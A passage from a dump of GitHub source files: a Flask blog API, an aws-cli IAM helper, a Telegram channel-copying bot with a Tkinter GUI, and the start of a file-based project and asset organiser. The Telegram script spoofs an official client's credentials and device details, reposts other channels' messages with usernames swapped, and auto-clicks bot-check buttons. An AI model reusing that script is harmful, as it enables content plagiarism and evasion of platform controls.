Post.query.filter_by(category=category).all()\n        return jsonify({\n            'posts': [post.to_json() for post in 
posts],\n            'count': len(posts)\n        })\n\n    return jsonify({'msg': 'No information...'})\n\n\n@api.route('/shuos')\n@cache.cached(60*60*24,query_string=True)\ndef get_shuos():\n    shuos = Shuoshuo.query.order_by(Shuoshuo.timestamp.desc()).all()\n\n    return jsonify({\n        'shuoshuo': [shuo.to_json() for shuo in shuos],\n        'count': len(shuos)\n    })\n\n\n@api.route('/comments/post/<int:id>')\n@cache.cached(60*60*24,query_string=True)\ndef get_post_comments(id):\n    post = Post.query.filter_by(id=id).first()\n    if post:\n        comments = Comment.query.filter_by(post=post).all()\n        return jsonify({'comments': [comment.to_json() for comment in comments]})\n\n    return jsonify({'msg': 'No information...'})\n\n\n@api.route('/comments/page/<int:id>')\n@cache.cached(60*60*24,query_string=True)\ndef get_page_comments(id):\n    page = Page.query.get_or_404(id)\n    if page:\n        comments = Comment.query.filter_by(page=page).all()\n        return jsonify({'comments': [comment.to_json() for comment in comments]})\n\n    return jsonify({'msg': 'No information...'})\n\n# post views\n@api.route('/view/<type>/<int:id>', methods=['GET'])\ndef views(type, id):\n    \"\"\"Page view counter\"\"\"\n    view = View.query.filter_by(type=type, relationship_id=id).first()\n    ckk='read_'+type\n    old_cookie=request.cookies.get(ckk)\n    if not view:\n        view = View(type=type, count=1, relationship_id=id)\n        db.session.add(view)\n        db.session.commit()\n        resp = jsonify(count=1)\n        if old_cookie:\n            if str(id) in old_cookie.split('-'):\n                cookie=old_cookie\n            else:\n                cookie=old_cookie+'-'+str(id)\n        else:\n            cookie=str(id)\n        resp.set_cookie(ckk, cookie, max_age=1 * 24 * 60 * 60)\n        return resp\n    else:\n        if old_cookie:\n            if str(id) in old_cookie.split('-'):\n                cookie=old_cookie\n            else:\n                cookie=old_cookie+'-'+str(id)\n                view.count += 1\n                db.session.add(view)\n                db.session.commit()\n        else:\n            cookie=str(id)\n            view.count += 1\n            db.session.add(view)\n            db.session.commit()\n        resp = jsonify(count=view.count)\n        resp.set_cookie(ckk, cookie, max_age=1 * 24 * 60 * 60)\n        return resp\n","repo_name":"abbey2023/ABlog","sub_path":"app/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"79"}
+{"seq_id":"15987331211","text":"import json\n\n\nclass IAM(object):\n\n    def __init__(self, iam_client):\n        self.iam_client = iam_client\n\n    def check_if_role_exists(self, role_name):\n        \"\"\"Method to verify if a particular role exists\"\"\"\n        try:\n            self.iam_client.get_role(RoleName=role_name)\n        except self.iam_client.exceptions.NoSuchEntityException:\n            return False\n        return True\n\n    def check_if_policy_exists(self, policy_arn):\n        \"\"\"Method to verify if a particular policy exists\"\"\"\n        try:\n            self.iam_client.get_policy(PolicyArn=policy_arn)\n        except self.iam_client.exceptions.NoSuchEntityException:\n            return False\n        return True\n\n    def attach_policy_to_role(self, policy_arn, role_name):\n        \"\"\"Method to attach LifecyclePolicy to role specified by role_name\"\"\"\n        return self.iam_client.attach_role_policy(\n            PolicyArn=policy_arn,\n            RoleName=role_name\n        )\n\n    def create_role_with_trust_policy(self, role_name, assume_role_policy):\n        \"\"\"Method to create role with a given role name\n        and assume_role_policy\n        \"\"\"\n        return self.iam_client.create_role(\n            RoleName=role_name,\n            AssumeRolePolicyDocument=json.dumps(assume_role_policy))\n\n    def get_policy(self, arn):\n        \"\"\"Method to get the Policy for a particular ARN\n        This is used to display the policy contents to the user\n        \"\"\"\n        pol_det = self.iam_client.get_policy(PolicyArn=arn)\n        policy_version_details = 
self.iam_client.get_policy_version(\n            PolicyArn=arn,\n            VersionId=pol_det.get(\"Policy\", {}).get(\"DefaultVersionId\", \"\")\n        )\n        return policy_version_details\\\n            .get(\"PolicyVersion\", {})\\\n            .get(\"Document\", {})\n","repo_name":"aws/aws-cli","sub_path":"awscli/customizations/dlm/iam.py","file_name":"iam.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":14456,"dataset":"github-code","pt":"79"}
+{"seq_id":"54026634563","text":"from telethon import TelegramClient, events, types, utils\nfrom telethon.tl.patched import Message\nfrom telethon.tl.custom.messagebutton import MessageButton\nfrom telethon.tl.types.messages import BotCallbackAnswer\nfrom telethon.tl.functions.account import UpdateStatusRequest\n\nimport asyncio\nimport logging\nimport tracemalloc\nimport os\nimport sqlite3\nimport re\nimport threading\nimport tkinter as tk\n\n#loop = asyncio.get_event_loop()\nscriptName = str(os.path.basename(__file__).split(\".\")[0])\nprint(\"Starting\", scriptName)\napi_id = 6\napi_hash = \"eb06d4abfb49dc3eeb1aeb98ae0f581e\"\napp_version = '5.11.0 (1709)'\ndevice_model = 'SM-M205FN'\nsystem_version = 'SDK 29'\n\ntracemalloc.start()\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n                    level=logging.WARN)\nlogger = logging.getLogger(__name__)\n\nclient_1 = TelegramClient(\"client_1_\" + scriptName, api_id, api_hash, app_version=app_version,\n                          device_model=device_model, system_version=system_version)\ndbConnection = sqlite3.connect(f\"data_{scriptName}.db\", isolation_level=None, check_same_thread=False)\n\nignore_entities = []\n\n# from_to = {-1001389557656: [-1001409636268, -1001412033708], -1001190739025: [-1001409636268, -1001412033708],\n#            -1001277274378: [-1001409636268, -1001412033708]}\nfrom_to = {-1001389557656: [-1001409636268], -1001190739025: [-1001409636268],\n           -1001277274378: [-1001409636268], -1001223414088: [-1001454406502],\n           -1001454800574: [-1001409636268]}\nfrom_to = {}\nreplaces = {'technicalpipsfx':'forexflow_admin'}\nanti_anti_bot = False\nreplace_username = \"\"\nsingle_client_mode = True\ndelete_messages = True\n\n\n\n\nasync def read_one_sqlite(sql, *args):\n    data = await loop.run_in_executor(None, lambda: dbConnection.cursor().execute(sql, args).fetchone())\n    return data\n\n\nasync def read_all_sqlite(sql, *args):\n    data = await loop.run_in_executor(None, lambda: dbConnection.cursor().execute(sql, args).fetchall())\n    return data\n\n\nasync def exec_sqlite(sql, *args):\n    return await loop.run_in_executor(None, lambda: dbConnection.cursor().execute(sql, args))\n\n\nclass BotMessageBind:\n    def __init__(self, in_db_id, from_chat_id, from_chat_msg_id, to_chat_id, to_chat_msg_id):\n        self.in_db_id: int = in_db_id\n        self.from_chat_id: int = from_chat_id\n        self.from_chat_msg_id: int = from_chat_msg_id\n        self.to_chat_id: int = to_chat_id\n        self.to_chat_msg_id: int = to_chat_msg_id\n\n    async def push_changes(self):\n        await exec_sqlite(\n            f\"UPDATE {scriptName}_messagebind SET `from_chat_id` = ?, `from_chat_msg_id` = ?, `to_chat_id` = ?, \"\n            \"`to_chat_msg_id` = ? 
WHERE in_db_id = ?\",\n self.from_chat_id, self.from_chat_msg_id, self.to_chat_id, self.to_chat_msg_id, self.in_db_id)\n\n\nasync def get_message_bind(in_db_id: int):\n res = await read_one_sqlite(f\"SELECT * FROM {scriptName}_messagebind WHERE in_db_id = ?\", in_db_id)\n if res is None:\n return None\n else:\n return BotMessageBind(*res)\n\n\nasync def get_message_bind_msg_id(from_chat_id: int, from_chat_msg_id: int, to_chat_id: int) -> [int, None]:\n res = await read_one_sqlite(\n f\"SELECT to_chat_msg_id FROM {scriptName}_messagebind WHERE from_chat_id = ? and \"\n f\"from_chat_msg_id = ? and to_chat_id = ?\", from_chat_id, from_chat_msg_id, to_chat_id)\n if res is None:\n return None\n else:\n return res[0]\n\n\nasync def create_message_bind(from_chat_id: int, from_chat_msg_id: int, to_chat_id: int, to_chat_msg_id: int):\n await exec_sqlite(\n f\"INSERT INTO {scriptName}_messagebind (from_chat_id, from_chat_msg_id, to_chat_id, to_chat_msg_id) VALUES \"\n f\"(?, ?, ?, ?)\", from_chat_id, from_chat_msg_id, to_chat_id, to_chat_msg_id)\n\n\nclass ProcessedMessage:\n def __init__(self, text, media):\n self.text = text\n self.media = media\n\n\nasync def process_message(message: Message, to_chat: int):\n if ignore_entities and message.entities:\n for entity in message.entities:\n if isinstance(entity, tuple(ignore_entities)):\n return\n if single_client_mode:\n media = message.media if not isinstance(message.media,\n (types.MessageMediaWebPage, types.MessageMediaPoll)) else None\n else:\n f_name = await message.download_media()\n media = f_name\n text_to_send = message.text\n if text_to_send:\n for key, value in zip(replaces.keys(), replaces.values()):\n text_to_send = re.sub(key, value, text_to_send, flags=re.IGNORECASE)\n completed = False\n\n if anti_anti_bot:\n if message.text and len(message.text) < 30 and message.buttons:\n for button_list in message.buttons:\n if completed:\n break\n for button in button_list:\n button: MessageButton\n if isinstance(button.button, types.KeyboardButtonCallback):\n res: BotCallbackAnswer = await button.click()\n text_to_send = res.message\n completed = True\n break\n lower = text_to_send.lower()\n if any(x in lower for x in ['succes ratio']):\n return False\n if replace_username:\n all_usernames = re.findall(r'@\\w+', text_to_send)\n if all_usernames:\n for uname in all_usernames:\n text_to_send = text_to_send.replace(uname, replace_username)\n return ProcessedMessage(text_to_send, media)\n\n\n@client_1.on(events.MessageDeleted())\nasync def delete_message_handler(event: events.MessageDeleted.Event):\n if delete_messages:\n if event.chat_id not in from_to:\n return\n for to in from_to[event.chat_id]:\n for deleted_id in event.deleted_ids:\n bound = await get_message_bind_msg_id(event.chat_id, deleted_id, to)\n if bound:\n await client_1.delete_messages(to, [bound])\n\n\n@client_1.on(events.MessageEdited())\nasync def edit_message_handler(event: events.MessageEdited.Event):\n if event.chat_id not in from_to:\n return\n message: Message = event.message\n for to in from_to[event.chat_id]:\n processed = await process_message(message, to)\n if not processed:\n raise events.StopPropagation\n ent = await client_1.get_input_entity(to)\n bound = await get_message_bind_msg_id(message.chat_id, message.id, to)\n if bound:\n await client_1.edit_message(ent, bound, processed.text, file=processed.media)\n if processed.media and not single_client_mode:\n os.remove(processed.media)\n\n\n@client_1.on(events.Album())\nasync def album_handler(event: events.Album.Event):\n 
if event.chat_id not in from_to:\n raise events.StopPropagation\n text = None\n for to in from_to[event.chat_id]:\n files = []\n for i, message in enumerate(event.messages):\n processed = await process_message(message, to)\n if not processed:\n raise events.StopPropagation\n if i == 0:\n text = processed.text\n files.append(processed.media)\n message = event.messages[0]\n ent = await client_1.get_input_entity(to)\n reply_to = None\n if message.reply_to_msg_id:\n reply_to = await get_message_bind_msg_id(event.chat_id, message.reply_to_msg_id, to)\n if not reply_to:\n return\n sent = await client_1.send_file(ent, file=files, caption=text, reply_to=reply_to)\n await create_message_bind(event.chat_id, message.id, to, sent[0].id)\n if not single_client_mode:\n for file in files:\n os.remove(file)\n raise events.StopPropagation\n\n\n@client_1.on(events.NewMessage(outgoing=True, incoming=True))\nasync def message_handler(event: events.NewMessage.Event):\n message: Message = event.message\n if not event.is_private:\n print(message.chat_id, message.text.replace(\"\\n\", \"\\\\n\") if message.text else None)\n if event.chat_id not in from_to:\n return\n\n if message.grouped_id:\n raise events.StopPropagation\n for to in from_to[event.chat_id]:\n processed = await process_message(message, to)\n if not processed:\n raise events.StopPropagation\n ent = await client_1.get_input_entity(to)\n reply_to = None\n\n if message.reply_to_msg_id:\n reply_to = await get_message_bind_msg_id(event.chat_id, message.reply_to_msg_id, to)\n if not reply_to:\n return\n await client_1(UpdateStatusRequest(False))\n\n sent: Message = await client_1.send_message(ent, processed.text, file=processed.media, reply_to=reply_to)\n await client_1(UpdateStatusRequest(True))\n await create_message_bind(event.chat_id, message.id, to, sent.id)\n if processed.media and not single_client_mode:\n os.remove(processed.media)\n\n\n\nasync def app():\n print('Preparing database...')\n await exec_sqlite(\n f\"CREATE TABLE IF NOT EXISTS {scriptName}_messagebind (`in_db_id` INTEGER DEFAULT 0 PRIMARY KEY ,\"\n f\" `from_chat_id` INTEGER DEFAULT 0, `from_chat_msg_id` INTEGER DEFAULT 0, \"\n f\"`to_chat_id` INTEGER DEFAULT 0, `to_chat_msg_id` INTEGER DEFAULT 0)\")\n print('Starting client_1 (receiver)...')\n await client_1.start()\n client_1_me = await client_1.get_me()\n await client_1.get_dialogs()\n print(f\"Authorized client_1 as @{client_1_me.username} ({utils.get_display_name(client_1_me)})\")\n print('Started')\n\n\nasync def start_app():\n \n print('starting main app now')\n await asyncio.sleep(1)\n await app()\ndef loop_in_thread(loop):\n asyncio.set_event_loop(loop)\n loop.run_until_complete(start_app())\nloop= asyncio.get_event_loop()\n\nt = threading.Thread(target=loop_in_thread, args=(loop,))\n#t.start()\n#loop= asyncio.get_event_loop()\nwindow = tk.Tk()\nwindow.geometry(\"650x400\")\n\n# define data frame here and bind with data entry widgets\ndata_frame = tk.Frame(window,relief=tk.RAISED, borderwidth=1,background='lightgray',width=300,height=200)\ndata_frame.place(x=0,y=0,width=650,height=175)\n# label widgets\nl_id = tk.Label(data_frame,text='api_id ',anchor='w',width=10)\nl_hash = tk.Label(data_frame,text='api hash ',anchor='w',width=10)\n#l_hash = tk.Label(window,text='enter api_hash: ')\nl_from = tk.Label(data_frame,text='from channel id ',anchor='w',width=10)\nl_to = tk.Label(data_frame,text=\"to channel_id\")\n\n# entery widgets\ntxt_id = tk.Entry(data_frame,width=60)\ntxt_hash = tk.Entry(data_frame,width=60)\ntxt_from = 
tk.Entry(data_frame,width=60)\ntxt_to = tk.Entry(data_frame,width=60)\n# status widgets\nstatus_var = tk.StringVar()\nstatus_var.set('status: application is off, press start app to run application')\n\nstatus = 'bot is running \\n'\ndef update_id():\n global api_id\n api_id = txt_id.get()\n txt_id.delete(0,tk.END)\n\n global status\n status = status + 'api id: '+str(api_id)+'\\n'\ndef update_hash():\n global api_hash\n api_hash = txt_hash.get()\n txt_hash.delete(0,tk.END)\n global status\n status = status + 'api hash: '+str(api_hash)+'\\n'\ndef update_from_to():\n # we update from_to dictionery which will be used for messaging binding\n val = int(txt_from.get())\n txt_from.delete(0,tk.END)\n val1 = int(txt_to.get())\n txt_to.delete(0,tk.END)\n # bind from chanel with to channel for communication \n from_to[val]= [val1]\n '''\n # create from_to_status string\n from_to_status = ' '\n for i in from_to:\n from_to_status = from_to_status+'from channel '+str(i)+' >>>> to channel '+ str(from_to[i])+'\\n' \n \n # append to status string\n global status\n status = status + from_to_status\n '''\ndef print_bindings():\n from_to_status = ' '\n for i in from_to:\n from_to_status = from_to_status+'from channel '+str(i)+' >>>> to channel '+ str(from_to[i])+'\\n' \n \n # append to status string\n global status\n status = status + from_to_status\ndef start_app_1():\n global status_var\n print_bindings()\n status_var.set(status)\n t.start()\n\ndef submit_data():\n update_id()\n update_hash()\n update_from_to()\n\ndef stop_app():\n loop.stop()\n status_var.set(\"Bot stopped now\")\n\n \n#button widgets\nbtn_id = tk.Button(data_frame,text='submit',width=15,command= update_id)\nbtn_hash = tk.Button(data_frame,text='submit',width=15,command= update_hash)\nbtn_from_to = tk.Button(data_frame,text='bind channels',width=15,command= update_from_to)\nbtn_all = tk.Button(data_frame,text='submit all',background='gray',width=15,command=submit_data)\n\n\n\n\n# define control frame here\n\ncontrol_frame = tk.Frame(window,relief=tk.RAISED,borderwidth=1,background='lightgray')\ncontrol_frame.pack(fill=tk.X,side=tk.BOTTOM)\n\n\n#start_button = tk.Button(window, text='start main app', bg='yellow',command = start_app_1)\n#stop_button = tk.Button(window, text='stop main app', bg='red',command = loop.stop)\n\nstart_button = tk.Button(control_frame, text=\"START APP\",background='green',width=15,command = start_app_1)\n\nstop_button = tk.Button(control_frame, text=\"STOP APP\",background='red',command = loop.stop)\nstart_button.pack(side=tk.LEFT, padx=5, pady=5)\nstop_button.pack(side=tk.RIGHT)\n\nlabel_frame = tk.LabelFrame(window, text=\"Application status\",width=650,height=200)\nlabel_frame.place(x=0,y=175)\n\n\noutput_label = tk.Label(label_frame,textvariable=status_var)\n\ndef main_gui():\n # paint labels on screen\n l_id.grid(column=0,row=0)\n l_hash.grid(column=0,row=1)\n l_from.grid(column=0,row=2)\n l_to.grid(column=0,row=3)\n # paint text boxes on screen\n txt_id.grid(column=1,row=0)\n txt_hash.grid(column=1,row=1)\n txt_from.grid(column=1,row=2)\n txt_to.grid(column=1,row=3)\n # pain buttons on window\n btn_id.grid(column=2,row=0)\n btn_hash.grid(column=2,row=1)\n btn_from_to.grid(column=2,row=3)\n btn_all.place(x=500,y=148)\n output_label.place(x=0,y=0)\n\n #start_button.grid(column=0,row=10)\n #stop_button.grid(column=0,row=11)\n\n #status_label.grid(column=0,row=12)\n window.mainloop()\n #stop_button.grid(window,row=11,column=0)\n #await 
asyncio.gather(client_1.run_until_disconnected(),main_gui())\n\n\nmain_gui()\n","repo_name":"bilalahhmedd/telegram-api-bot","sub_path":"flotime/final_copier.py","file_name":"final_copier.py","file_ext":"py","file_size_in_byte":14354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"71170903935","text":"import os\r\nimport shutil\r\nimport db\r\nimport tkinter as tk\r\nfrom tkinter import filedialog as fd\r\nfrom time import sleep\r\n\r\nwin = tk.Tk()\r\nwin.withdraw()\r\n\r\ncwd = os.path.join(os.getcwd(), 'Folders')\r\nfolders = {'Active': os.path.join(cwd, 'Active'),\r\n 'Store': os.path.join(os.getcwd(), 'Folders', 'Store'),\r\n 'Video': ['Video'],\r\n 'Assets': ['Assets'],\r\n 'Music': ['Assets', 'Music'],\r\n 'SFX': ['Assets', 'SFX'],\r\n 'Sprites': ['Assets', 'Sprites'],\r\n 'VFX': ['Assets', 'VFX'],\r\n 'Free': ['Free']}\r\ntrash_folder = os.path.join(folders['Store'], 'Trash')\r\nif not os.path.exists(trash_folder):\r\n os.makedirs(trash_folder)\r\nasset_type = {'sf': 'SFX', 'mu': 'Music', 'sp': 'Sprites', 'vf': 'VFX', 'vi': 'Video', 'f': 'Free'}\r\n\r\n\"\"\" COMMANDS\r\n crp - creates new project\r\n dlp - deletes a project\r\n dla - deletes asset from project\r\n dlu - deletes user\r\n crap- creates asset\r\n clap- loads asset\r\n ga - gets attribution\r\n rma - removes asset\r\n lp - loads project\r\n atd - adds asset to database\r\n dtp - gets asset from database into project\r\n \"\"\"\r\n\r\n\r\ndef copyfile(source, destination):\r\n try:\r\n shutil.copy(source, destination)\r\n print(\"File moved\")\r\n except shutil.SameFileError:\r\n print(\"Source and destination are the same\")\r\n except PermissionError as e:\r\n print(\"Needs permission: \", e)\r\n except Exception as e:\r\n print(\"Error: \", e)\r\n\r\n\r\ndef resetActiveFolder():\r\n if not os.path.exists(folders['Active']):\r\n os.makedirs(folders['Active'])\r\n else:\r\n shutil.rmtree(folders['Active'], ignore_errors=True)\r\n os.makedirs(folders['Active'])\r\n\r\n for folder in folders:\r\n\r\n if folder in ('Active', 'Store', 'Free'):\r\n continue\r\n\r\n path = os.path.join(cwd, 'Active')\r\n for f in folders[folder]:\r\n path = os.path.join(path, f)\r\n\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n\r\n fp = open(os.path.join(folders['Active'], 'Script.txt'), 'w')\r\n fp.close()\r\n\r\n\r\ndef deleteDirectory(path):\r\n if os.path.exists(path):\r\n shutil.rmtree(path, ignore_errors=True)\r\n print(f\"Successfully Deleted {path}\")\r\n if os.path.exists(path):\r\n print(f\"Could not delete {path}\")\r\n else:\r\n print(f\"Successfully Deleted {path}\")\r\n else:\r\n print(\"Path does not exit\")\r\n\r\n\r\ndef deleteFile(path):\r\n if os.path.exists(path):\r\n shutil.move(path, trash_folder)\r\n shutil.rmtree(trash_folder, ignore_errors=True)\r\n os.makedirs(trash_folder)\r\n if os.path.exists(path):\r\n print(f\"Could not delete {path}\")\r\n else:\r\n print(f\"Successfully Deleted {path}\")\r\n else:\r\n print(\"Path does not exit\")\r\n\r\n\r\ndef restart(old):\r\n del old\r\n proj = ProjectOrganiser()\r\n proj.db.cursor.close()\r\n\r\n\r\nclass Project:\r\n def __init__(self, id, name, desc=''):\r\n self.id = id\r\n self.name = name\r\n self.desc = desc\r\n self.assets = {}\r\n self.path = os.path.join(folders['Store'], 'Projects', id)\r\n self.createFiles()\r\n\r\n def createFiles(self):\r\n if not os.path.exists(self.path):\r\n os.makedirs(self.path)\r\n os.makedirs(os.path.join(self.path, \"Assets\"))\r\n 
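# Build the rest of this project's folder tree: the Video folder next, then every asset subfolder defined in the global 'folders' map.\r\n            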
os.makedirs(os.path.join(self.path, \"Video\"))\r\n\r\n for folder in folders:\r\n\r\n if folder in ['Active', 'Store']:\r\n continue\r\n\r\n path = self.path\r\n for f in folders[folder]:\r\n path = os.path.join(path, f)\r\n\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n\r\n def getAssetID(self):\r\n ids = []\r\n for asset in self.assets:\r\n asst = self.assets[asset]\r\n ids.append((asst.id, asst.gp))\r\n return ids\r\n\r\n\r\nclass Asset:\r\n def __init__(self, id, master, name, type, description, attribution=None, gp='p'):\r\n self.id = id\r\n self.name = name\r\n self.master = master\r\n self.file_ext = self.name.split('.')[-1]\r\n self.type = type\r\n self.desc = description\r\n self.attr = attribution\r\n self.gp = gp\r\n self.path = self.setPath()\r\n\r\n def setPath(self):\r\n path = ''\r\n if self.gp == 'g':\r\n path = os.path.join(folders['Store'], 'Assets', self.type, f'{self.id}.{self.file_ext}')\r\n elif self.gp == 'p':\r\n path = os.path.join(folders['Store'], 'Projects', self.master.id)\r\n for f in folders[self.type]:\r\n path = os.path.join(path, f)\r\n path = os.path.join(path, f\"{self.id}.{self.file_ext}\")\r\n return path\r\n\r\n\r\nclass ProjectOrganiser:\r\n def __init__(self):\r\n self.projects = {}\r\n self.activeProject = None\r\n self.assets = {}\r\n self.all_assets = {}\r\n\r\n self.db = db.DataBase()\r\n if not self.db.connected:\r\n print(\"\\n\\nDatabase connection failed\\n\\n\")\r\n return\r\n self.user = self.login()\r\n\r\n self.loadProjects()\r\n self.loop()\r\n\r\n def login(self):\r\n while 1:\r\n username = input(\"\\nWhat is your username? >\")\r\n user = self.db.checkUser(username)\r\n\r\n if self.db.checkUser(username) is not None:\r\n print(f\"\\nWelcome {user[0]}\\n\")\r\n return user\r\n else:\r\n yn = input(\"\\nWould you like to create an account? (y/n) \\n>\")\r\n if yn == 'y':\r\n user = self.db.createUser(username)\r\n print(f\"\\nWelcome {user[0]}\\n\")\r\n return user\r\n else:\r\n continue\r\n\r\n def deleteUser(self):\r\n y_n = input(f'ARE YOU SURE YOU WANT TO DELETE {self.user[0]}?!?! 
\\nIT IS IRREVERSIBLE(y/n)> ')\r\n if y_n != 'y':\r\n return\r\n\r\n prjs = dict(self.projects)\r\n success = self.db.deleteUser(self.user[1])\r\n if not success:\r\n return\r\n\r\n for project in prjs:\r\n self.deleteProject(prjs[project].name)\r\n restart(self)\r\n\r\n def loadProjects(self):\r\n resetActiveFolder()\r\n projects = self.db.loadProjects(self.user[1])\r\n\r\n if projects is None:\r\n return\r\n\r\n if len(projects) < 1:\r\n print(\"\\nNo projects available, creating one now\\n\")\r\n self.createProject(input(\"Give it a name > \"))\r\n\r\n for project in projects:\r\n\r\n prj = Project(project[0], project[1], project[2])\r\n self.projects[prj.name] = prj\r\n\r\n self.activeProject = prj\r\n\r\n self.loadAssets()\r\n print(f\"\\nProjects loaded successfully \\nAvailable Projects: {[x for x in self.projects]} \\n\"\r\n f\"Active Project: {self.activeProject.name}\")\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def loadProject(self, name):\r\n if name not in self.projects:\r\n print(f\"\\nProject [{name}] is not in the database\")\r\n return\r\n\r\n self.activeProject = self.projects[name]\r\n\r\n resetActiveFolder()\r\n self.loadAssets()\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def createProject(self, name):\r\n resetActiveFolder()\r\n desc = input('\\nWanna add a description?> ')\r\n id = self.db.createProject(name, self.user[1], desc)\r\n\r\n if id is None:\r\n return\r\n\r\n self.projects[name] = Project(id, name)\r\n self.activeProject = self.projects[name]\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def deleteProject(self, name):\r\n if name not in self.projects:\r\n print(f\"\\nProject [{name}] is not in the database\")\r\n return\r\n\r\n proj = self.projects[name]\r\n success = self.db.deleteProject(proj.id, proj.getAssetID())\r\n if not success:\r\n return\r\n self.projects.pop(name)\r\n deleteFile(proj.path)\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def loadAssets(self):\r\n if len(self.projects) < 1:\r\n return\r\n\r\n all_assets = self.db.getAssets(self.activeProject.id)\r\n if all_assets is None:\r\n return\r\n\r\n personal, general, all_general = all_assets[0], all_assets[1], all_assets[2]\r\n\r\n for asset in general:\r\n asst = Asset(asset[0], self.activeProject, asset[1], asset[2], asset[3], asset[4], 'g')\r\n name = asset[1]\r\n if asset[1] not in self.activeProject.assets:\r\n self.activeProject.assets[asset[1]] = asst\r\n else:\r\n i = 0\r\n while 1:\r\n name = asset[1].split('.')\r\n name = f\"{name[0]}[{i}].{name[1]}\"\r\n if name not in self.activeProject.assets:\r\n self.activeProject.assets[name] = asst\r\n break\r\n else:\r\n i += 1\r\n file_ext = asset[1].split('.')[-1]\r\n\r\n source = os.path.join(folders['Store'], 'Assets', asset[2], f\"{asset[0]}.{file_ext}\")\r\n\r\n dest = os.path.join(folders['Active'])\r\n for f in folders[asset[2]]:\r\n if asset[2] == 'Free':\r\n continue\r\n elif asset[2] == 'Video':\r\n dest = os.path.join(dest, 'Video')\r\n else:\r\n dest = os.path.join(dest, f)\r\n dest = os.path.join(dest, name)\r\n copyfile(source, dest)\r\n\r\n for asset in personal:\r\n asst = Asset(asset[0], self.activeProject, asset[1], asset[2], asset[3], gp='p')\r\n name = asset[1]\r\n if asset[1] not in self.activeProject.assets:\r\n self.activeProject.assets[asset[1]] = asst\r\n else:\r\n i = 0\r\n while 1:\r\n name = asset[1].split('.')\r\n name = f\"{name[0]}[{i}].{name[1]}\"\r\n if name not in self.activeProject.assets:\r\n self.activeProject.assets[name] = asst\r\n break\r\n else:\r\n i += 1\r\n\r\n file_ext = 
asset[1].split('.')[-1]\r\n\r\n source = os.path.join(folders['Store'], 'Projects', self.activeProject.id)\r\n for f in folders[asset[2]]:\r\n source = os.path.join(source, f)\r\n source = os.path.join(source, f\"{asset[0]}.{file_ext}\")\r\n\r\n dest = os.path.join(folders['Active'])\r\n for f in folders[asset[2]]:\r\n if asset[2] == 'Free':\r\n continue\r\n else:\r\n dest = os.path.join(dest, f)\r\n dest = os.path.join(dest, name)\r\n copyfile(source, dest)\r\n\r\n for asset in all_general:\r\n asst = Asset(asset[0], self.activeProject, asset[1], asset[2], asset[3], asset[4], 'g')\r\n self.all_assets[asset[1]] = asst\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def addAsset(self):\r\n\r\n # Makes sure that there is a project available to avoid errors\r\n if len(self.projects) < 1:\r\n print(\"There is no project to import to\")\r\n return\r\n\r\n # Gets the path of the file relative to the active folder\r\n path = input('\\nPath to file >')\r\n active = folders['Active']\r\n path = path.split(',')\r\n\r\n for item in path:\r\n active = os.path.join(active, item)\r\n\r\n if not os.path.exists(active):\r\n print(\"\\nFile Does not exist\")\r\n return\r\n\r\n # Gets the type of file for database loading and saving\r\n type = self.getAssetType()\r\n\r\n while 1:\r\n gp = input(\"General or Personal (g,p) >\")\r\n if gp in ('g', 'p'): break\r\n\r\n desc = input(\"\\nDescription >\")\r\n\r\n if gp == 'g':\r\n attr = input(\"\\nAttribution >\")\r\n else:\r\n attr = \"\"\r\n\r\n print(f'''\\nPlease double check information \\n\r\n Name: {path[-1]} \\n\r\n Type: {type} {gp}\\n\r\n Description:{desc}\\n\r\n Attribution:{attr}\\n''')\r\n\r\n if input(\"(y/n)\") != 'y':\r\n return\r\n\r\n id = self.db.addAsset(self.activeProject.id, path[-1], type, desc, attr, gp)\r\n\r\n if id is None:\r\n print('Could not add asset')\r\n return\r\n\r\n asst = Asset(id, self.activeProject, path[-1], type, desc, attr, gp)\r\n if path[-1] not in self.activeProject.assets:\r\n self.activeProject.assets[path[-1]] = asst\r\n else:\r\n i = 0\r\n while 1:\r\n name = path[-1].split('.')\r\n name = f\"{name[0]}[{i}].{name[1]}\"\r\n if name not in self.activeProject.assets:\r\n self.activeProject.assets[name] = asst\r\n break\r\n else:\r\n i += 1\r\n\r\n file_ext = path[-1].split('.')[-1]\r\n dest = ''\r\n if gp == 'p':\r\n dest = os.path.join(folders['Store'],'Projects',self.activeProject.id)\r\n for f in folders[type]:\r\n dest = os.path.join(dest, f)\r\n dest = os.path.join(dest, f\"{id}.{file_ext}\")\r\n elif gp == 'g':\r\n dest = os.path.join(folders['Store'], 'Assets', type, f'{id}.{file_ext}')\r\n\r\n print(active)\r\n copyfile(active, dest)\r\n\r\n sleep(2)\r\n os.system('cls')\r\n\r\n def assetToDatabase(self):\r\n print(\"\\nOpening dialogue\")\r\n\r\n path = fd.askopenfilename()\r\n if not os.path.exists(path):\r\n return\r\n\r\n path = os.path.normpath(path)\r\n filename = os.path.basename(path)\r\n file_ext = filename.split('.')[-1]\r\n\r\n name = input(\"\\nWant to change the name? 
